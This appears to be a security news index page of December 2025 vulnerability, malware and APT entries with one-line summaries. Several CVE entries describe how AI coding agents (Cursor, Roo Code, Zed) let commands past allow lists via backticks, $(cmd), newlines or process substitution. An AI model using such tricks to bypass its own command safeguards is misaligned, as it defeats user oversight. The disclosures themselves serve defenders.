HOT NEWS 2025 January(141) February(191) March(268) April(349) May(260) June(502) July(272) August(180) September(202) October(252) November(308) December(118) THREATS YEARS
|
DATE |
NAME |
INFO |
CATEGORY |
SUBCATE |
| 13.12.25 | CVE-2025-54100 | CVE-2025-54100 - PowerShell Remote Code Execution Vulnerability |
VULNEREBILITY |
|
| 13.12.25 | CVE-2025-64671 | CVE-2025-64671 - GitHub Copilot for Jetbrains Remote Code Execution Vulnerability |
VULNEREBILITY |
|
| 13.12.25 | CVE-2025-62221 | CVE-2025-62221 - Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
VULNEREBILITY |
|
| 13.12.25 |
Ransomware Trends in Bank Secrecy Act Data Between 2022 and 2024 |
This Financial Trend Analysis (FTA) focuses on ransomware patterns and trends identified in Bank Secrecy Act (BSA) data. The Financial Crimes Enforcement Network (FinCEN) is issuing this report pursuant to section 6206 of the Anti-Money Laundering Act of 2020 (codified at 31 U.S.C. § 5318(g)(6) (B)), which requires periodic publication of BSA-derived threat pattern and trend information. | REPORT | RANSOMWARE |
| 13.12.25 | TOTOLINK's X5000R's (AX1800 router) lacks authentication for telnet | An unauthenticated HTTP request can enable telnet which may lead to remote code execution with root-level privileges. | ALERT | ALERT |
| 13.12.25 | Vulnerabilities identified in PCIe Integrity and Data Encryption (IDE) protocol specification | PCI Express Integrity and Data Encryption (PCIe IDE), introduced in the PCIe 6.0 standard, provides link-level encryption and integrity protection for data transferred across PCIe connections. | ALERT | ALERT |
| 13.12.25 | EtherHiding | Hiding Web2 Malicious Code in Web3 Smart Contracts | HACKING | MALWARE |
| 13.12.25 | CVE-2025-54100 | PowerShell Remote Code Execution Vulnerability |
VULNEREBILITY |
|
| 13.12.25 | CVE-2025-42928 | Under certain conditions, a high privileged user could exploit a deserialization vulnerability in SAP jConnect to launch remote code execution. |
VULNEREBILITY |
|
| 13.12.25 | CVE-2025-55754 | Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages |
VULNEREBILITY |
|
| 13.12.25 | CVE-2025-42880 | Due to missing input sanitation, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. |
VULNEREBILITY |
|
| 13.12.25 | Operation MoneyMount-ISO | Table of Contents: Introduction: Targeted sectors: Initial Findings about Campaign: Analysis of Phishing Mail: Infection Chain: Technical Analysis: Stage-1: Analysis of Malicious ISO file. Stage-2: Analysis of Executable. Analysis of 1st Payload Analysis of 2nd Payload (Phantom Stealer) Conclusion:... | OPERATION | OPERATION |
| 13.12.25 | Operation FrostBeacon | Operation FrostBeacon: Multi-Cluster Cobalt Strike Campaign Targets Russia Contents Introduction Key Targets Geographical Focus Industries Affected LNK Cluster Initial Access: | OPERATION | OPERATION |
| 13.12.25 | GROUP 123 | Group123 is a North Korean state-sponsored advanced persistent threat (APT) group active since at least 2012. It is also tracked under other names such as APT37, Reaper, and | APT | APT |
| 13.12.25 | Golang Stealer | This week, SonicWall Capture Labs Threat Research Team analyzed a sample of SalatStealer. This is a Golang malware capable of infiltrating a system and enumerating through browsers, files, cryptowallets and systems while embedding a complete array of monitoring tools to push and pull any data on disk. | MALWARE | STEALER |
| 13.12.25 | ValleyRAT | Cracking ValleyRAT: From Builder Secrets to Kernel Rootkits | MALWARE | RAT |
| 13.12.25 | SetcodeRat | SetcodeRat Exposed: A Telegram Secret Stealing Trojan Customized for Chinese-speaking Regions | MALWARE | RAT |
| 13.12.25 | PyStoreRAT | PyStoreRAT: A New AI-Driven Supply Chain Malware Campaign Targeting IT & OSINT Professionals | MALWARE | RAT |
| 13.12.25 | BlackForce | Technical Analysis of the BlackForce Phishing Kit | PHISHING | KIT |
| 13.12.25 | Spiderman | Spiderman Phishing Kit Mimics Top European Banks With A Few Clicks | PHISHING | KIT |
| 13.12.25 | GhostFrame | Threat Spotlight: Introducing GhostFrame, a new super stealthy phishing kit | PHISHING | KIT |
| 12.12.25 | AshTag | Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite | MALWARE | MALWARE |
| 12.12.25 | AridViper | AridViper, an intrusion set allegedly associated with Hamas | GROUP | GROUP |
| 12.12.25 | CVE-2025-55182 | Meta React Server Components Remote Code Execution Vulnerability |
VULNEREBILITY |
|
| 12.12.25 | CVE-2025-58360 | OSGeo GeoServer Improper Restriction of XML External Entity Reference Vulnerability |
VULNEREBILITY |
|
| 12.12.25 | CVE-2025-55184 | (CVSS score: 7.5) - A pre-authentication denial of service vulnerability arising from unsafe deserialization of payloads from HTTP requests to Server Function endpoints, triggering an infinite loop that hangs the server process and may prevent future HTTP requests from being served |
VULNEREBILITY |
|
| 12.12.25 | CVE-2025-67779 | (CVSS score: 7.5) - An incomplete fix for CVE-2025-55184 that has the same impact |
VULNEREBILITY |
|
| 12.12.25 | CVE-2025-55183 | (CVSS score: 5.3) - An information leak vulnerability that may cause a specifically crafted HTTP request sent to a vulnerable Server Function to return the source code of any Server Function |
VULNEREBILITY |
|
| 12.12.25 | CVE-2024-55947 | Gogs is an open source self-hosted Git service. A malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server. The vulnerability is fixed in 0.13.1. |
VULNEREBILITY |
|
| 12.12.25 | CVE-2025-8110 | Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code. |
VULNEREBILITY |
|
| 12.12.25 | NANOREMOTE | The fully-featured backdoor we call NANOREMOTE shares characteristics with malware described in REF7707 and is similar to the FINALDRAFT implant. | MALWARE | BACKDOOR |
| 12.12.25 | SOAPwn | SOAPwn: Pwning .NET Framework Applications Through HTTP Client Proxies And WSDL | EXPLOIT | EXPLOIT |
| 12.12.25 | PeerBlight | PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182 | MALWARE | BACKDOOR |
| 10.12.25 | CVE-2025-54100 | (CVSS score: 7.8) - A command injection vulnerability in Windows PowerShell that allows an unauthorized attacker to execute code locally |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-64671 | (CVSS score: 8.4) - A command injection vulnerability in GitHub Copilot for JetBrains that allows an unauthorized attacker to execute code locally |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-62223 | Microsoft Edge (Chromium-based) for Mac Spoofing Vulnerability |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-62221 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-54131 | Cursor is a code editor built for programming with AI. In versions below 1.3, an attacker can bypass the allow list in auto-run mode with a backtick (`) or $(cmd). |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-59458 | In JetBrains Junie before 252.284.66, 251.284.66, 243.284.66, 252.284.61, 251.284.61, 243.284.61, 252.284.50, 252.284.54, 251.284.54, 251.284.50, 243.284.54, 243.284.50 code execution was possible due to improper command validation |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-54377 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions 3.23.18 and below, RooCode does not validate line breaks (\n) in its command input, allowing potential bypass of the allow-list mechanism. The project appears to lack parsing or validation logic to prevent multi-line command injection. |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-57771 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions prior to 3.25.5, Roo-Code fails to properly handle process substitution and single ampersand characters in the command parsing logic for auto-execute commands. |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-65946 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Prior to version 3.26.7, Due to an error in validation it was possible for Roo to automatically execute commands that did not match the allow list prefixes. This issue has been patched in version 3.26.7. |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-9612 | (Forbidden IDE Reordering) – A missing integrity check on a receiving port may allow re-ordering of PCIe traffic, leading the receiver to process stale data |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-9613 | (Completion Timeout Redirection) – Incomplete flushing of a completion timeout may allow a receiver to accept incorrect data when an attacker injects a packet with a matching tag. |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-9614 | (Delayed Posted Redirection) – Incomplete flushing or re-keying of an IDE stream may result in the receiver consuming stale, incorrect data packets. |
VULNEREBILITY |
|
| 10.12.25 | GOLD BLADE’s | Sharpening the knife: GOLD BLADE’s strategic evolution | APT | APT |
| 10.12.25 | JS#SMUGGLER | JS#SMUGGLER: Multi-Stage - Hidden Iframes, Obfuscated JavaScript, Silent Redirectors & NetSupport RAT Delivery | MALWARE | JAVASCRIPT |
| 10.12.25 | APT-C-08 | WinRAR CVE-2025-6218 Exploit: In-Depth Analysis of the APT-C-08 Directory Traversal Attack | APT | APT |
| 10.12.25 | CVE-2025-8088 | A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET. |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-6218 | RARLAB WinRAR Path Traversal Vulnerability |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-62221 | Microsoft Windows Use After Free Vulnerability |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-59719 | An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. |
VULNEREBILITY |
|
| 10.12.25 | CVE-2025-59718 | A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 |
VULNEREBILITY |
|
| 10.12.25 | EtherRAT | EtherRAT: DPRK uses novel Ethereum implant in React2Shell attacks | MALWARE | RAT |
| 10.12.25 | CastleLoader | GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries | MALWARE | LOADER |
| 10.12.25 | Storm-0249 | Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation | APT | APT |
| 8.12.25 | CVE-2025-2611 | The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable. |
VULNEREBILITY |
|
| 8.12.25 | The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). |
VULNEREBILITY |
||
| 8.12.25 | SEEDSNATCHER | Dissecting an Android Malware Targeting Multiple Crypto Wallet Mnemonic Phrases | MALWARE | ANDROID |
| 8.12.25 | ClayRat | Return of ClayRat: Expanded Features and Techniques | MALWARE | RAT |
| 8.12.25 | FvncBot | New FvncBot Android banking trojan targets Poland | MALWARE | ANDROID |
| 8.12.25 | UDPGangster | MuddyWater campaign analysis reveals macro-based delivery, extensive anti-analysis techniques, and shared infrastructure links | CAMPAIGN | CAMPAIGN |
| 7.12.25 | Snowlight | A malware dropper that allows remote attackers to drop additional payloads on breached devices. | MALWARE | Dropper |
| 7.12.25 | Vshell | A backdoor commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network. | MALWARE | Backdoor |
| 7.12.25 | CVE-2025-55182 | A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2022-41049 | Windows Mark of the Web Security Feature Bypass Vulnerability |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-49150 | Cursor is a code editor built for programming with AI. Prior to 0.51.0, by default, the setting json.schemaDownload.enable was set to True. This means that by writing a JSON file, an attacker can trigger an arbitrary HTTP GET request that does not require user confirmation. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-53097 | Roo Code is an AI-powered autonomous coding agent. Prior to version 3.20.3, there was an issue where the Roo Code agent's `search_files` tool did not respect the setting to disable reads outside of the VS Code workspace |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-58335 | In JetBrains Junie before 252.284.66, 251.284.66, 243.284.66, 252.284.61, 251.284.61, 243.284.61, 252.284.50, 252.284.54, 251.284.54, 251.284.50, 243.284.54, 243.284.50 information disclosure was possible via search_project function |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-53773 | Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code locally. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-54130 | Cursor is a code editor built for programming with AI. Cursor allows writing in-workspace files with no user approval in versions less than 1.3.9. If the file is a dotfile, editing it requires approval but creating a new one doesn't. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-53536 | Roo Code is an AI-powered autonomous coding agent. Prior to 3.22.6, if the victim had "Write" auto-approved, an attacker with the ability to submit prompts to the agent could write to VS Code settings files and trigger code execution. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-55012 | Zed is a multiplayer code editor. Prior to version 0.197.3, in the Zed Agent Panel allowed for an AI agent to achieve Remote Code Execution (RCE) by bypassing user permission checks. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-64660 | Improper access control in GitHub Copilot and Visual Studio Code allows an authorized attacker to execute code over a network. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-61590 | Cursor is a code editor built for programming with AI. Versions 1.6 and below are vulnerable to Remote Code Execution (RCE) attacks through Visual Studio Code Workspaces. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-58372 | Roo Code is an AI-powered autonomous coding agent that lives in users' editors. Versions 3.25.23 and below contain a vulnerability where certain VS Code workspace configuration files (.code-workspace) are not protected in the same way as the .vscode folder. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-55182 | Meta React Server Components Remote Code Execution Vulnerability |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47322 | Memory corruption while handling IOCTL calls to set mode. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47320 | Memory corruption while processing MFC channel configuration during music playback. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-27063 | Memory corruption during video playback when video session open fails with time out error. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47321 | Memory corruption while copying packets received from unix clients. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47387 | Memory Corruption when processing IOCTLs for JPEG data without verification. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47350 | Memory corruption while handling concurrent memory mapping and unmapping requests from a user-space application. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47325 | Information disclosure while processing system calls with invalid parameters. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47323 | Memory corruption while routing GPR packets between user and root when handling large data packet. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47372 | Memory Corruption when a corrupted ELF image with an oversized file size is read into a buffer without authentication. |
VULNEREBILITY |
|
| 7.12.25 | CVE-2025-47319 | Exposure of Sensitive System Information to an Unauthorized Control Sphere in HLOS |
VULNEREBILITY |
|
| 6.12.25 | RondoDox | Tracking RondoDox: Malware Exploiting Many IoT Vulnerabilities | MALWARE | IOT |
| 6.12.25 | HashJack Attack | HashJack Attack Targets AI Browsers and Agentic AI Systems | ATTACK | AI |
| 6.12.25 | CVE-2025-54988 | Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. |
VULNEREBILITY |
|
| 6.12.25 | CVE-2025-66516 | Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. |
VULNEREBILITY |
|
| 6.12.25 | CVE-2025-1338 | A vulnerability was found in NUUO Camera up to 20250203. It has been declared as critical. This vulnerability affects the function print_file of the file /handle_config.php. The manipulation of the argument log leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. |
VULNEREBILITY |
|
| 6.12.25 | V3G4 Botnet | CRIL has uncovered an active V3G4 campaign using a Mirai-derived botnet alongside a fileless, runtime-configured cryptominer. | BOTNET | BOTNET |
| 6.12.25 | Operation DupeHike | Contents Introduction Key Targets. Industries Affected. Geographical Focus. Infection Chain. Initial Findings. Looking into the decoy-document Technical Analysis Stage 1 – Malicious LNK Script Stage 2 – DUPERUNNER Implant Stage 3 – AdaptixC2 Beacon. Infrastructural Artefacts. Conclusion SEQRITE Protection.... | OPERATION | OPERATION |
| 5.12.25 | Benzona Ransomware | A new ransomware operation known as Benzona has surfaced, showing signs of rapid development and growing confidence. The malware encrypts victim files using the “.benzona” extension and drops a ransom note titled RECOVERY_INFO.txt, warning that sensitive data has already been exfiltrated. Victims are given a 72-hour deadline to negotiate via a Tor-based chat portal, with threats of data publication should they refuse. | RANSOM | |
| 5.12.25 | DupeRunner and AdaptixC2 malware deployed within the Operation DupeHike | The SEQRITE researchers have uncovered a targeted cyber espionage campaign dubbed Operation DupeHike. The campaign is focused on various sectors including HR, payroll, and administrative departments. The attack utilizes sophisticated social engineering tactics, deploying realistic decoy documents centered on employee financial bonuses to lure victims. | OPERATION | |
| 5.12.25 | Symbiote and BPFdoor Linux malware variants implement new eBPF filters | Symbiote and BPFdoor are two Linux malware strains known to utilize Berkeley Packet Filter (BPF) packet sniffer to monitor network traffic and send packets only on existing open ports, bypassing firewall rules and network protections. As reported by researchers from Fortinet, both called out malware families have recently implemented new extended Berkeley Packet Filters (eBPFs) within the distributed payloads. | VIRUS | |
| 5.12.25 | Datebug APT deploys malware targeting BOSS Linux systems | The Pakistan-based advanced persistent threat (APT) group known as Datebug (aka APT36, Transparent Tribe, Storm-0156) is reported to be behind recent attacks targeting Indian government entities running Bharat Operating System Solutions (BOSS) Linux. | APT | |
| 5.12.25 | CVE-2025-61757 - Oracle Fusion Middleware vulnerability | CVE-2025-61757 is a recently disclosed critical (CVSS score 9.8) missing authentication vulnerability affecting the Identity Manager product of Oracle Fusion Middleware. If successfully exploited the flaw might provide unauthenticated attackers with network access via HTTP to compromise Identity Manager leading up to takeover of the vulnerable Identity Manager instance by the threat actors. | VULNEREBILITY | |
| 5.12.25 | CVE-2025-12480 - Gladinet Triofox vulnerability | CVE-2025-12480 is a recently disclosed critical (CVSS score 9.1) improper access control vulnerability affecting Gladinet Triofox file server and storage solution. If successfully exploited the flaw might allow unauthenticated remote attackers access to the vulnerable application configuration pages and enable them to perform upload and execution of arbitrary payloads. | VULNEREBILITY | |
| 5.12.25 | LotusHarvest malware deployed in Operation Hanoi Thief | SEQRITE Labs’ researchers have identified "Operation Hanoi Thief," a malicious cyber campaign targeting IT professionals and HR recruiters in Vietnam. The campaign employs spear-phishing emails containing fake resumes to deliver malware used to steal confidential user data. | OPERATION | |
| 5.12.25 | Arkanix Stealer | Researchers at G DATA recently observed a new infostealer dubbed Arkanix. According to their findings, it was initially built in Python and distributed via Discord as a fake “utility,” but it quickly evolved — a native C++ “premium” version now exists, complete with VMProtect obfuscation. Its capabilities are standard for commodity stealers. | VIRUS | |
| 5.12.25 | Albiriox mobile RAT | Albiriox is a new Android malware operating under a Malware-as-a-Service (MaaS) model, designed to facilitate on-device fraud, VNC‑based remote control and overlay attacks. As reported by researchers from Cleafy, the malware spreads through social engineering, specifically targeting Austrian victims via fake applications distributed through SMS and WhatsApp lures | VIRUS | |
| 5.12.25 | CVE-2025-34299 - Monsta FTP vulnerability | CVE-2025-34299 is a recently disclosed critical (CVSS score 9.3) arbitrary file upload vulnerability affecting Monsta FTP solution (version 2.11.2 and earlier). If successfully exploited the flaw might allow unauthenticated remote attackers to perform arbitrary code execution by uploading a specially crafted file from malicious SFTP or FTP servers. | VULNEREBILITY | |
| 5.12.25 | Duc contains a stack buffer overflow vulnerability in the buffer_get function, allowing for out-of-bounds memory read | Duc, an open-source disk management tool, contains a stack-based buffer overflow vulnerability allowing for out-of-bounds memory read. | ALERT | ALERT |
| 5.12.25 | Insufficient Session Cookie Invalidation in nopCommerce ASP.NET Core eCommerce Platform | nopCommerce, an ecommerce platform, fails to invalidate session cookies upon user logout or session termination, enabling attackers to use the captured cookie to gain access to the application. This vulnerability is extremely similar to CVE-2019-7215. | ALERT | ALERT |
| 5.12.25 | Intellexa Leaks | Global: “Intellexa Leaks” investigation provides further evidence of spyware threats to human rights. | BIGBROTHER | BIGBROTHER |
| 5.12.25 | ValleyRAT | Silver Fox’s Russian Ruse: ValleyRAT Hits China via Fake Microsoft Teams Attack | MALWARE | RAT |
| 5.12.25 | BRICKSTORM Backdoor | The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Canadian Centre for Cyber Security (Cyber Centre) assess People’s Republic of China (PRC) state-sponsored cyber actors are using BRICKSTORM malware for long-term persistence on victim systems. V | MALWARE | BACKDOOR |
| 4.12.25 |
Cloudflare's 2025 Q3 DDoS threat report -- including Aisuru, the apex of botnets |
Welcome to the 23rd edition of Cloudflare’s Quarterly DDoS Threat Report. This report offers a comprehensive analysis of the evolving threat landscape of Distributed Denial of Service (DDoS) attacks based on data from the Cloudflare network. In this edition, we focus on the third quarter of 2025. | BOTNET | BOTNET |
| 4.12.25 | CVE-2025-55182 | A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. |
VULNEREBILITY |
|
| 4.12.25 | CVE-2025-9491 | Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. |
VULNEREBILITY |
|
| 4.12.25 | CVE-2025-8489 | The King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor plugin for WordPress is vulnerable to privilege escalation in versions 24.12.92 to 51.1.14 . |
VULNEREBILITY |
|
| 3.12.25 | ShadyPanda's | 4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign | APT | APT |
| 3.12.25 | CVE-2025-10155 | (CVSS score: 9.3/7.8) - A file extension bypass vulnerability that can be used to undermine the scanner and load the model when providing a standard pickle file with a PyTorch-related extension such as .bin or .pt |
VULNEREBILITY |
|
| 3.12.25 | CVE-2025-10156 | (CVSS score: 9.3/7.5) - A bypass vulnerability that can be used to disable ZIP archive scanning by introducing a Cyclic Redundancy Check (CRC) error |
VULNEREBILITY |
|
| 3.12.25 | CVE-2025-10157 | (CVSS score: 9.3/8.3) - A bypass vulnerability that can be used to undermine Picklescan's unsafe globals check, leading to arbitrary code execution by getting around a blocklist of dangerous imports |
VULNEREBILITY |
|
| 3.12.25 | Glassworm's resurgence | Security can't take holidays off, but the code marketplace scanners just might. Over the past week, we've identified and tracked an unprecedented 23 extensions which copy other popular extensions, update after publishing with malware, manipulate download counts, and use KNOWN attack signatures which have been in use for months. Many of these relate to Glassworm malware, but there could be mulitple campaigns at work also. | MALWARE | Worm |
| 3.12.25 | MuddyWater | MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook | APT | APT |
| 2.12.25 | Android Security Bulletin—December 2025 | This Android Security Bulletin contains details of security vulnerabilities that affect Android devices. Security patch levels of 2025-12-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version. | VULNEREBILITY | VULNEREBILITY |
| 2.12.25 | Albiriox | Albiriox Exposed: A New RAT Mobile Malware Targeting Global Finance and Crypto Wallets | MALWARE | Android |
| 2.12.25 | Tomiris | Tomiris wreaks Havoc: New tools and techniques of the APT group | APT | APT |
| 2.12.25 | CVE-2021-26829 | OpenPLC ScadaBR Cross-site Scripting Vulnerability: OpenPLC ScadaBR contains a cross-site scripting vulnerability via system_settings.shtm. |
VULNEREBILITY |